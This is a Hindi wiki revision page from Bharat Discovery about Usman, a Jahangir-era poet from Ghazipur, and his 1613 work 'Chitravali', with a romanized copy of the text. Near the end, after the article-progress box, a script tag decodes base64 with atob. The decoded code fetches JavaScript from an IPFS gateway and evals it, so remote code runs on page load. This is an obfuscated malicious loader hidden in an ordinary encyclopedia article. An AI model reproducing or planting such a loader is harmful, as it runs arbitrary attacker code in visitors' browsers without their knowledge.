Difference between revisions of "उसमान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('उसमान जहाँगीर के समय में वर्तमान थे और गाजीपुर के...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
उसमान [[जहाँगीर]] के समय में वर्तमान थे और [[गाजीपुर]] के रहने वाले थे। इनके पिता का नाम 'शेख हुसैन' था और ये पाँच भाई थे। और चारों भाइयों के नाम थे शेख अजीज, शेख मानुल्लाह, शेख फैजुल्लाह, शेख हसन। इन्होंने अपना उपनाम 'मान' लिखा है।  
+
'''उसमान''' [[जहाँगीर]] के समय में वर्तमान थे और [[गाजीपुर]] के रहने वाले थे। इनके पिता का नाम 'शेख हुसैन' था और ये पाँच भाई थे। और चारों भाइयों के नाम थे शेख अजीज, शेख मानुल्लाह, शेख फैजुल्लाह, शेख हसन। इन्होंने अपना उपनाम 'मान' लिखा है।  
 
 
 
*उसमान शाह [[निज़ामुद्दीन चिश्ती]] की शिष्य परंपरा में 'हाजी बाबा' के शिष्य थे। उसमान ने सन् 1022 हिजरी अर्थात् 1613 ईसवी में '[[चित्रावली]]' नाम की पुस्तक लिखी। पुस्तक के आरंभ में कवि ने स्तुति के उपरांत पैगंबर और चार खलीफों की, [[जहाँगीर|बादशाह जहाँगीर]] की तथा शाह निजामुद्दीन और हाजी बाबा की प्रशंसा लिखी है। उसके आगे गाजीपुर नगर का वर्णन करके कवि ने अपना परिचय देते हुए लिखा है कि -
 
*उसमान शाह [[निज़ामुद्दीन चिश्ती]] की शिष्य परंपरा में 'हाजी बाबा' के शिष्य थे। उसमान ने सन् 1022 हिजरी अर्थात् 1613 ईसवी में '[[चित्रावली]]' नाम की पुस्तक लिखी। पुस्तक के आरंभ में कवि ने स्तुति के उपरांत पैगंबर और चार खलीफों की, [[जहाँगीर|बादशाह जहाँगीर]] की तथा शाह निजामुद्दीन और हाजी बाबा की प्रशंसा लिखी है। उसके आगे गाजीपुर नगर का वर्णन करके कवि ने अपना परिचय देते हुए लिखा है कि -
 
<poem>आदि हुता विधि माथे लिखा । अच्छर चारि पढ़ै हम सिखा।
 
<poem>आदि हुता विधि माथे लिखा । अच्छर चारि पढ़ै हम सिखा।
Line 13: Line 12:
 
<poem>कथा एक मैं हिए उपाई। कहत मीठ और सुनत सोहाई</poem>
 
<poem>कथा एक मैं हिए उपाई। कहत मीठ और सुनत सोहाई</poem>
  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}  
 
 
 
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 10:16, 8 August 2012

usaman jahaangir ke samay mean vartaman the aur gajipur ke rahane vale the. inake pita ka nam 'shekh husain' tha aur ye paanch bhaee the. aur charoan bhaiyoan ke nam the shekh ajij, shekh manullah, shekh phaijullah, shekh hasan. inhoanne apana upanam 'man' likha hai.

  • usaman shah nizamuddin chishti ki shishy paranpara mean 'haji baba' ke shishy the. usaman ne sanh 1022 hijari arthath 1613 eesavi mean 'chitravali' nam ki pustak likhi. pustak ke aranbh mean kavi ne stuti ke uparaant paiganbar aur char khaliphoan ki, badashah jahaangir ki tatha shah nijamuddin aur haji baba ki prashansa likhi hai. usake age gajipur nagar ka varnan karake kavi ne apana parichay dete hue likha hai ki -

adi huta vidhi mathe likha . achchhar chari padhai ham sikha.
dekhat jagat chala sab jaee . ek vachan pai amar rahaee.
vachan saman sudha jag nahian . jehi pae kavi amar rahahian.
mohooan chau utha puni hie . houan amar yah amarit pie

  • kavi ne 'yogi dhooandhan khand' mean kabul, badakhshaan, khurasan, roos, sam, misr, istanbol, gujarat, sianhaladvip adi anek deshoan ka ullekh kiya hai. sabase vilakshan bat hai jogiyoan ka aangrejoan ke dvip mean pahuanchane ka bhi varnan kiya hai -

balandip dekha aangareja . tahaan jai jehi kathin kareja
ooanch nich dhan sanpatti hera . mad barah bhojan jinh kera

  • kavi ne is rachana mean jayasi ka poora anukaran kiya hai. jo jo vishay jayasi ne apani pustak mean rakhe haian un vishayoan par usaman ne bhi kuchh kaha hai.
  • kahian kahian to shabd aur vaky vinyas bhi vahi haian. par visheshata yah hai ki kahani bilkul kavi ki kalpit hai, jaisa ki kavi ne svayan kaha hai

katha ek maian hie upaee. kahat mith aur sunat sohaee


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh